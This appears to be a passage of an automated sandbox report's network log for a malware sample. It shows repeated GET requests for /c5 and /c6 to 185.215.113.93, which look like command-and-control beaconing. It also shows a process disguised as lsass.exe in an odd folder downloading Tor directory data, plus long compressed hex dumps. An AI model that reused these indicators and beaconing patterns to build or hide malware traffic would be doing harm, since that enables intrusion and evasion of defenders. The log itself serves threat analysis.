            Jan 10, 2024 15:38:30.595370054 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:38:30 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
            Jan 10, 2024 15:38:31.611371994 CET170OUTGET /c5 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:38:31.852922916 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:38:31 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
            Jan 10, 2024 15:38:32.863312960 CET170OUTGET /c6 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
            Host: 185.215.113.93
            Jan 10, 2024 15:38:33.104935884 CET728INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Wed, 10 Jan 2024 14:38:32 GMT
            Content-Type: text/html
            Content-Length: 564
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.649726193.11.164.24390304596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:39:00.161336899 CET147OUTGET /tor/status-vote/current/consensus.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 193.11.164.243:9030
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:39:00.375082016 CET1286INHTTP/1.0 200 OK
            Date: Wed, 10 Jan 2024 14:39:00 GMT
            Content-Type: text/plain
            X-Your-Address-Is: 102.165.48.42
            Content-Encoding: deflate
            Expires: Wed, 10 Jan 2024 15:00:00 GMT
            Vary: X-Or-Diff-From-Consensus
            Data Raw: 78 da ec fd 69 73 a3 c8 b6 05 0c 7f 3f bf 82 ef ea b2 48 48 26 c5 73 9e 78 98 34 cf 68 7e e3 44 07 33 08 04 88 41 08 fd fa 37 13 bb aa 6c 6c 75 57 77 9f be d7 a5 db 15 65 59 b6 06 8b 4d b2 73 0f 6b af 15 d9 79 19 a7 c1 97 2c d7 f3 22 fb 72 b1 d3 cc 8f 23 82 fe d7 25 ce ed 97 df 12 66 1c 65 76 94 15 d9 bf be dd fb 72 b2 73 2f b6 08 1a 3d 53 0f 7d eb 8b ee e4 76 4a 50 24 05 bf 90 e0 0b 20 09 00 3b 24 89 fe ff cb 49 ed cc fb 52 44 b9 1f be 79 9c 79 79 fc f9 f5 ef 1f e7 be 3e 1e e7 7e e4 7e b1 ec 50 af 08 9a 24 f1 d7 bf cc d0 b7 a3 fc eb e7 cd 08 f2 09 3e 71 4f dc 2f cf df f9 97 ef 80 fc 7a 07 7c bd 43 7d bd 43 7f bd 03 bf de 61 be de 61 eb 3b fc 13 f8 a2 87 89 a7 bf fc 44 bd f9 89 fe 92 9a 2f 77 e1 cb 77 e6 e5 fb d7 97 73 2f df f9 97 ef c2 d7 b7 25 ff 95 d9 29 fa e8 3f ed c7 0f a2 b8 8c be 38 a1 ee 66 84 58 a0 85 90 fa 79 45 48 ba a5 5e fd 9c a8 6f ba 7a 96 13 bd 42 4f 2d a2 af 29 7e 4a 4c 7c cb 0a ed 59 14 56 c4 34 56 2d f9 eb 4a 22 96 45 14 a1 13 4c 68 b9 6e 84 36 fe 16 da 8a 9d 99 84 56 19 68 49 6c 28 fc ea 0d 5e 24 ff 4a 6d 33 3e 9d ec c8 b2 ad 2f 2f 2b 20 49 e3 3c 36 e3 30 23 f0 3b fe 9b 22 f0 4b f1 37 3f 95 75 d3 b3 d1 dd fa ef d7 df 07 51 9e c6 ff 86 e8 de 12 bd 09 fa d5 d8 8f 82 7f c3 2f 0c fa 74 66 1a 5b cf 2f 5d e2 95 f6 6f ea cd 5f 4b f1 ef fe 5b 7f 0c df c1 66 fb 37 7d e7 ef 9e 0b 3f fd fd 43 7c 7e bf df 7e 8b ff c9 cf 9d e8 a9 7e 7a 5e 10 e8 bd 26 fa 55 ab 57 79 36 b7 53 d1 b2 d2 7f f3 84 ec a7 66 e1 e7 f3 d4 af 57 4c 5f 0f 9d d0 77 ec 49 66 9b ff 46 57 35 ba b6 95 58 7b 79 92 9c da 7a 8e 2e 0e a9 48 b3 fc df ec 47 0f a9 11 5e 31 d6 bf c1 07 8f 4d fc 08 1d 6b 64 9b f8 87 fa 90 df 3d 65 a9 e7 f6 cb 03 df 9e f9 f6 2d bf fd 1a 1d 0c fa c1 2c d2 14 9d 10 39 46 ce ea df 4c fd 89 96 b6 53 64 b6 86 d6 6f 68 f7 e3 44 ae cf 18 b6 9b 7d bb c4 45 86 de 47 bd e6 e8 47 a9 52 2d 8a 61 80 30 50 d0 ef 46 03 6d a5 21 bb 5b 68 ed 23 73 23 33 e9 21 32 ea b4 38 4d 57 71 6d b0 95 38 ff 37 40 f6 58 67 f6 2c c9 fd 93 9f e5 be a9 e8 b9 8e 5e 6d 94 3a 32 71 e2 5b f5 fd cc d4 d1 a7 4c 7f 35 4d f4 a3 69 e4 b9 9d e5 c8 e5 9e d1 cb 09 d3 fc 55 0f 5d 74 8c e8 8e 59 46 d6 af 4e 11 86 bf ba 7a 82 4e ef 9b 5f 9d fc 28 31 f3 7f 53 cc b7 5f fb 51 fd 7e df 7f fa 35 c5 e6 a2 bf ff 0e bd e6 df 80 aa df 28 43 1f 22 f9 d5 46 d7 3d 3a 51 e4 f7 df c4 11 b2 dd bf 21 57 bf ed c5 76 f5 ec d7 da 09 3d 3f 15 f0 ec f7 df 1b 76 ae bf 3c 9f e6 a8 ef bf 47 6e 3f 7f 79 3e fd 7c 44 af 7f ff f2 07 68 f8 fd 01 57 3f 9d be 3e 40 41 9e 30 9d eb af 61 5c d6 6f f1 6b ee e1 cd 28 0e 2d 74 fa f0 07 45 0b e2 d7 93 7e fd d5 b4 91 11 ce 85 5d d8 bf 66 fe cd 46 c7 c5 dc 7f f4 d7 b8 c8 f1 c9 21 09 2b ce 7e 8d 8a d3 af df 9e 89 1e 39 ff 9b 21 5c ec f7 be 44 e8 ba f3 4f 7a 5a 7d b1 fc f4 4b fd bb ec 4b 1e 7f 41 0b 06 9d 92 e6 73 9a 8f 7b d9 af 78 97 f0 4d bb 7e e7 d4 ba fc ea e8 7e 58 a0 03 40 27 c6 cb d0 7b fe 9a 25 68 29 5b bf 66 79 9c da e8 94 c6 e8 6a 0b 63 f4 8b fa e8 b3 c0 8f 7e 8d d0 43 bf 26 36 ba e0 d0 d3 6c 13 bd 94 e4 d1 07 bf f7 4c 74 d6 42 1b 3f df b4 eb 25 4e 12 c8 49 5b 27 fb 57 fb 84 ac 87 ce f8 af 2f 5b d6 bf c1 bf 32 4f af 3d 8c 1e 59 e8 20 ec 8b 1f e3 00 42 0f 0b 9b e0 88 bc 9d 70 b9 7d 1c f6 38 6b 61 fa 07 f2 b0 1f 2d 4b 36 5f 8e af 5d c9 4f 1c 8b a1 b8 64 99 d0 92 7e 0d fe fd e6 9d 5e ae b1
            Data Ascii: xis?HH&sx4h~D3A7lluWweYMsky,"r#%fevrs/=S}vJP$ ;$IRDyyy>~~P$>qO/z|C}Caa;D/wws/%)?8fXyEH^ozBO-)~JL|YV4V-J"ELhn6VhIl(^$Jm3>//+ I<60#;"K7?uQ/tf[/]o_K[f7}?C|~~~z^&UWy6SfWL_wIfFW5X{yz.HG^1Mkd=e-,9FLSdohD}EGGR-a0PFm![h#s#3!28MWqm87@Xg,^m:2q[L5MiU]tYFNzN_(1S_Q~5(C"F=:Q!Wv=?v<Gn?y>|DhW?>@A0a\ok(-tE~]fF!+~9!\DOzZ}KKAs{xM~~X@'{%h)[fyjc~C&6lLtB?%NI['W/[2O=Y Bp}8ka-K6_]Od~^


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.649728199.58.81.140804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:39:15.320205927 CET777OUTGET /tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 199.58.81.140
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:39:15.428867102 CET1286INHTTP/1.0 200 OK
            Date: Wed, 10 Jan 2024 14:39:15 GMT
            Content-Type: text/plain
            X-Your-Address-Is: 102.165.48.42
            Content-Encoding: deflate
            Pragma: no-cache
            Data Raw: 38 cb 94 55 57 93 ab 48 b2 7e e7 57 f0 30 4f a3 55 ab 80 c2 9d 88 8e b8 85 93 47 16 21 b4 b1 0f 78 21 e1 8d 30 bf fe 56 77 ef cc a1 67 4f ac 51 b7 50 66 56 92 95 f9 65 d6 57 65 d6 d4 7e 49 d6 59 f9 c8 dc a7 1f 93 14 14 df 58 ee 0d c2 37 c8 93 10 32 24 20 01 11 79 7e 5a 47 75 3f f5 3d 9a 65 29 91 98 7e 7c 24 75 be d4 49 55 f9 34 91 b2 7a 3c 7f 9a 09 74 38 20 69 c8 2e c8 db e4 eb 65 9d 19 57 9b cb f4 4c da 3d bd 67 a7 6c fc 3c 5b dd d4 13 75 06 d6 23 86 35 1c e4 62 9e a2 03 0a 25 24 eb 37 ed 71 27 a8 ce b5 b6 db c9 09 95 4b 5d df 2f e5 be 00 97 cd a9 85 c2 e6 50 97 3c 7f d0 5f 40 d3 f5 07 ef f6 0c bb 12 5e ed 26 da dd d2 f5 cd 04 cf 6e dd a4 6b 9d 70 e0 61 8d 12 78 bb 27 c6 b9 45 43 65 1a 66 31 30 aa 0a 96 33 93 bd eb c9 ec 6a 5b b9 c5 b9 fb c3 59 2c d6 a0 d8 9a f7 d7 b9 69 6f a7 83 f1 fe 55 9b aa 2b bf a8 2c b1 2b 8c d6 f4 e9 ff 89 04 f9 30 8f 16 f4 dc eb 5c 51 f6 cf 70 dd 2b e7 73 8f aa a2 d6 4e a0 da ed 65 b0 b1 27 13 a0 38 a2 74 3e 10 79 6c d7 41 56 26 e4 39 2b 49 f0 06 df 84 37 0a 90 59 4a 6e a2 b4 e9 88 bc cc ea 8c 94 b3 34 88 9b ee 9d fa 90 aa 77 6a 4a 93 8a 5f b9 5f 42 54 ca b6 7b f7 df 69 52 8b b3 56 ae cb f8 d3 be 38 e1 95 f7 8f df 65 5a 97 d9 3b 9c b2 58 3e fa a9 f7 b9 8c c3 3f b1 c0 7e 0a a8 a9 ef ef d4 df 18 72 1b b9 65 e6 fd 11 7a 6f 7b 5e 94 86 38 c8 d1 8f ed 1e db 20 91 37 4e 1c 55 77 df 23 69 40 c3 29 a0 a6 38 5d 00 7e d0 d4 0f 00 89 00 bb fb 65 5e 46 69 4d 02 8d 83 24 02 1c 4d aa aa 24 90 9c 2c 6b a4 42 e3 e9 11 a0 40 93 1c 23 2b 24 27 4a 3c 09 04 49 26 55 01 b0 44 93 d7 51 e2 93 18 44 1a 42 8a 70 ec d4 6b 23 af be 93 14 e0 19 1e 52 02 0d bf 8b 50 84 b4 c0 10 7e 57 97 f6 34 4a 83 6c ea 45 a1 5f d5 24 c7 21 5a a2 29 99 97 28 55 e6 11 ad 29 8c 04 90 c4 a9 9c 40 23 4a a3 15 c0 41 41 d6 64 b2 68 e8 a1 9a 08 9b 85 b6 cc 62 eb da 1f 8d 95 66 d0 97 f8 90 d8 cd 91 72 5c 7f 07 35 84 9e b2 9e 40 22 4b a3 2c fd 68 f4 78 d4 8f 27 44 ee 0d 69 b3 94 c9 b5 6a 7d 8d c4 76 39 5f a1 6c 2e 21 9d ae fc 8d 37 ef 75 f7 46 f3 77 f3 be 64 d7 ee 62 72 dc 01 fe 51 4d 56 61 a3 a3 49 09 ad 52 70 ce 20 65 94 08 e6 f7 0b c5 cf 05 22 84 46 f3 3c d9 3e 73 71 9e 66 6c bd a2 bd 59 e4 aa 55 ce 36 bc 91 16 da 4d ab c3 70 af 5b 5c c0 88 9c fd 60 ee 8a c5 de 67 af db 69 7d 1b ee 7d c1 ab c4 20 ad b2 49 4e 0b db 02 79 02 3d 98 6d b5 c8 56 be cd 57 e5 b6 33 1f aa fb 08 07 6f 41 ed 57 7a 7b d4 f6 f3 12 24 8d 26 a2 70 2b 21 a4 8e 86 fd 57 b5 55 51 98 e2 26 ff 6f 30 3c b2 50 63 16 9c 53 5d dc 15 3e 13 f3 f4 ec 31 07 68 d3 d2 f2 c4 1a 83 1f a8 e6 62 36 cb 2b c6 e8 25 fd de 81 a5 a4 ad 65 eb 4a 5c 25 4b 58 5f fc 7d ff 92 e9 4b a8 23 fd ee 00 7f 5d 5e 7a e9 26 6b d6 5a 91 03 ba a8 61 2d da fe 89 3a ee af 69 b5 c9 82 c9 61 76 bc f2 46 db 55 02 4b cc c4 e1 e0 14 a7 e0 8a f6 95 b3 88 f3 3b 2f 3c b7 5d f0 34 e1 7c 55 1c 6c f7 c8 e8 e6 a2 7b 76 ec 3e 2e 79 ef b1 32 b2 fd e2 bf 83 e1 cf 59 98 e2 03 53 55 ae 5f d6 63 38 e4 e3 ee 74 fa c9 11 ed 2b 62 1d d4 cc 5d db 94 f7 7d 8e 2c e5 34 8f 2f 54 b2 b2 cf a8 db f2 c1 4e b9 b4 43 49 f9 35 a7 9f 26 4c a2 32 69 63 b5 13 38 a9 66 b5 52 2e ca 90 98 73 5d e5 43 2d d1 65 47 0c 76 1c e6 17 a5 78 20 76 df 3c 58 cf f5 6e e7 9a 43 76 66 50 e7 cb 86 52 bc 94 ee ad 84 95 8b 6b a5 84 37 36 f7 67 08 b3 75 a4 95 05 5d 28 37 1b 4d f2 e8 11 ab d6 b2 a7 5f 06 14 23 f3 7e bd 27 87 f2 b5 9b e9 97 d9 5d a1 84 51 e5 7f 29 23 c5 57 c2 f4 17 95 e3 db e0 3f 90 7f 86 c9 bf 97 90 45 3d cd dd e2 aa 75 61 3b b0 4b b9 0a 01 10 c2 cd
            Data Ascii: 8UWH~W0OUG!x!0VwgOQPfVeWe~IYX72$ y~ZGu?=e)~|$uIU4z<t8 i.eWL=gl<[u#5b%$7q'K]/P<_@^&nkpax'ECef103j[Y,ioU+,+0\Qp+sNe'8t>ylAV&9+I7YJn4wjJ__BT{iRV8eZ;X>?~rezo{^8 7NUw#i@)8]~e^FiM$M$,kB@#+$'J<I&UDQDBpk#RP~W4JlE_$!Z)(U)@#JAAdhbfr\5@"K,hx'Dij}v9_l.!7uFwdbrQMVaIRp e"F<>sqflYU6Mp[\`gi}} INy=mVW3oAWz{$&p+!WUQ&o0<PcS]>1hb6+%eJ\%KX_}K#]^z&kZa-:iavFUK;/<]4|Ul{v>.y2YSU_c8t+b]},4/TNCI5&L2ic8fR.s]C-eGvx v<XnCvfPRk76gu](7M_#~']Q)#W?E=ua;K
            Jan 10, 2024 15:39:15.428913116 CET714INData Raw: ba 3c 1a f5 46 79 b4 b5 4c bf 5e 35 a2 67 07 03 20 65 9f 2d 4e bc 7f ed ec 82 c8 3c 3a 2d 5f 7c e8 2b 74 c5 df 64 69 55 28 4d 10 e8 a7 7c 06 d8 93 77 b4 e2 a7 69 cf cc b5 9e bc 76 da 8b 97 c2 8e 72 85 b4 bd 8b ca fd 7a 98 04 9b 17 f1 aa c3 a6 7c
            Data Ascii: <FyL^5g e-N<:-_|+tdiU(M|wivrz|-f:[2G_"lRn[G>;{pcCBJQ..R2oNn6\V'6$Jo&o4?7/EuU`roA[m45RHfG
            Jan 10, 2024 15:39:15.429019928 CET1286INData Raw: 5d d8 6f 6a 6b c6 3c 9e 8b e8 bc e0 93 be 9a dc e7 c6 65 72 d9 b7 eb 7d ab df 0e 6a e9 10 0f 07 50 f9 83 9e 83 3a 56 93 c5 b0 9b 08 da 04 2e 51 99 f4 90 cf b5 c4 ba 01 d9 ea bd 84 df 6b 60 74 d7 fd a5 8c af 8a c9 53 86 81 f6 71 d9 34 be 1b 84 37
            Data Ascii: ]ojk<er}jP:V.Qk`tSq47o`H<H@DQ12Y=ICem-z9i.8^.brVBywr=FIg`<tAQz)-&'Y!b+xnZ+Kw^Z
            Jan 10, 2024 15:39:15.429102898 CET1286INData Raw: d0 db 07 bb 7d 90 db 07 b7 7d 50 1b f9 1b 27 8a 1c cb a8 ac a2 01 11 4a 2c 8e ca d2 3c ab 09 08 6a 38 34 e2 65 56 52 58 95 d6 c8 df 54 9c 14 cf b1 a2 aa 69 94 ac 89 3c 4f 49 2c e2 19 95 12 55 09 93 19 0f 10 85 77 61 01 71 8f 3c cf 4f a7 95 5f be
            Data Ascii: }}P'J,<j84eVRXTi<OI,Uwaq<O_"Wn[UoJ3QJ?HKkI6M^-oJ,8u&4>RL/?H'}RN}/f{\d_IA
            Jan 10, 2024 15:39:15.429203033 CET1286INData Raw: b9 e8 f8 30 1b 06 24 9b 3c 5b f9 c0 8e f8 a5 58 68 09 57 f5 1a c0 97 59 91 16 22 15 e7 c7 7c bf 09 4e 25 18 9d b3 d7 46 d2 e9 79 76 cd a7 f3 56 b3 bf a3 bd 46 b7 8e 1f fa 01 ef ab 3e 5e fd 7b 6d f8 a5 85 0f b3 29 65 19 25 45 f5 7b 3b 9c d1 60 3c
            Data Ascii: 0$<[XhWY"|N%FyvVF>^{m)e%E{;`<v}m5UNvO(>63_d=w.Vlk6m8ys7Lo;bc8lEq6.U{=-\o<$JCYR
            Jan 10, 2024 15:39:15.429276943 CET1286INData Raw: 8e c8 ff 3b 12 44 88 a0 b4 96 3c aa 22 fc 48 b3 4d 6e 48 b2 4d ca ca 22 c4 83 5a d9 ae 04 5c 52 aa 5d ea d9 06 7d 8e e2 14 ba 82 4a 1b 12 ad 24 23 ca 6a 5c eb 65 b5 ed a8 5e 8f 8c f1 90 b1 d3 d8 21 cf 69 e1 b2 d7 ad e5 0c 36 9d d9 bd e3 3b d5 3a
            Data Ascii: ;D<"HMnHM"Z\R]}J$#j\e^!i6;:^/.o7;2o*h8~elgQoj Y<-,=fy>, Ens|0{u"-;nooGcyVI-Fscl*)7?n{
            Jan 10, 2024 15:39:15.429373026 CET1286INData Raw: 5d a4 3c 6d 7d 31 93 f0 b4 b4 b5 ed 99 74 3c 8f 73 b3 41 98 12 c8 a4 51 04 b1 91 66 18 68 ce cc 8c 6c 2e b5 09 e3 99 c1 13 d7 b6 6d 08 30 43 42 33 6a 0b 9b 31 ad 18 61 66 c4 d8 28 d9 f4 db ac 0b f4 24 c7 dc bc 70 90 10 66 e2 0e 66 26 3d e3 df 35
            Data Ascii: ]<m}1t<sAQfhl.m0CB3j1af($pff&=5I0AMuL1p0-ar(3rM4%SR verG2iPC?lq+POWOWyH$;iWv$@fD'aT)4^I@
            Jan 10, 2024 15:39:15.429464102 CET1286INData Raw: d6 ce bd 0c 5e 24 26 4b ca c2 83 55 70 6c 7b 2e 2f 40 fc ec 72 52 9e b2 7e d4 eb ba aa 62 1d d3 64 b9 48 25 7f 1c c6 b6 a2 ee 9d f7 bb 8e ef cb 21 b9 fa b9 de dd 3b d5 da 1d f6 b7 3e f2 0f c7 41 89 5c 73 37 ec 77 93 21 bd 84 a6 3c 59 9c 1f c1 f2
            Data Ascii: ^$&KUpl{./@rR~bdH%!;>A\s7w!<YqSle1O3w'j0?lS:mdQjQzp]ju'sE{-Kilt8L}~2}_edGgn<^`i3&"/QD}'uo
